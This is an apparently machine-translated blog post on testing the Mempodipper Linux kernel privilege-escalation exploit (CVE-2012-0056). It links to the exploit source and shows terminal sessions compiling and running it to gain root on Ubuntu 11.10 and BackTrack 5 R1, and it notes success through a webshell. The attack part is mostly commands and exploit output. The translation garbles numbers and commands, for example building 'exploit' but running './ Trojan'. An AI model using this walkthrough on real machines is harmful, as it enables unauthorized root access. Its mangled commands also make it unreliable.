This is absolutely awesome, and 2.6.39 on top of the kernel all the presence of this vulnerability. Original source http://blog. zx2c4. com/7 4 9, The 利用 代码 可 在 这里 找到 http://www.dis9.com/code/mempodipper-CVE-2012-0056.c.html the.
The use of the/proc/pid/mem write,/poc file system is a virtual file system, does not occupy any disk space, the system is running good reflect the dynamic, the system can be used as a kernel data structure’s interface./ proc/pid/mem is a read-write process of the memory interface. The use of very cleverly, e text good you can see the original. Here a test under power.
I’m in 2. 6. 3 9. 4 and 3. 0. 0-1 2 The test is successful, the platform respectively, is the bt5r1(ubuntu10. 0 4)and ubuntu11. 1 to 0.
ubuntu11. 1 0:
left@left-T-6843c:~$uname-a
Linux left-T-6843c 3.0.0-1 2-generic #2 0-Ubuntu SMP Fri Oct 7 1 4:5 0:4 2 UTC 2 0 1 1 i686 i686 i386 GNU/Linux
left@left-T-6843c:~$id
uid=1 0 0 0(left) gid=1 0 0 0(left) groups=1 0 0 0(left),4(adm),2 0(dialout),2 4(cdrom),4 6(plugdev),1 1 6(lpadmin),1 1 8(admin),1 2 4(sambashare)
left@left-T-6843c:~$ cd desktop
left@left-T-6843c:~/desktop$ gcc-o exploit exploit. c
left@left-T-6843c:~/desktop$ chmod +x exploit
left@left-T-6843c:~/desktop$ ./ Trojan
===============================
= Mempodipper =
= by zx2c4 =
= Jan 2 1, 2 0 1 2 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3 4 1 7/mem in the chi ld.
[+] Sending fd 5 to pare nt.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading gpasswd for exit@plt.
[+] Resolved exit@plt to 0x8049770.
[+] Calculating gpasswd padding.
[+] Seeking to offset 0x8049760.
[+] Executing gpasswd with shellcode.
uid=0(root) gid=0(root) groups=0(root),4(adm),2 0(dialout),2 4(cdrom),4 6(plugdev),1 1 6(lpadmin),1 1 8(admin),1 2 4(sambashare),1 0 0 0(left)
In bt5r1 test on the left@bt:~$ cd Desktop
left@bt:~/Desktop$ id
uid=1 0 0 1(left) gid=1 0 0 1(left) groups=1 0 0 1(left)
left@bt:~/Desktop$ uname-a
Linux bt 2.6.39.4 #1 SMP Thu Aug 1 8 1 3:3 8:0 2 p.m. NZST 2 0 1 1 i686 GNU/Linux
left@bt:~/Desktop$ chmod +x exploit
left@bt:~/Desktop$ ./ Trojan
===============================
= Mempodipper =
= by zx2c4 =
= Jan 2 1, 2 0 1 2 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/1 8 8 5/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading gpasswd for exit@plt.
[+] Resolved exit@plt to 0x8049dc0.
[+] Calculating gpasswd padding.
[+] Seeking to offset 0x8049db0.
[+] Executing gpasswd with shellcode.
sh-4.1# id
uid=0(root) gid=0(root) groups=1 0 0 1(left)
I’m in a webshell on the test is also successful, very to the force.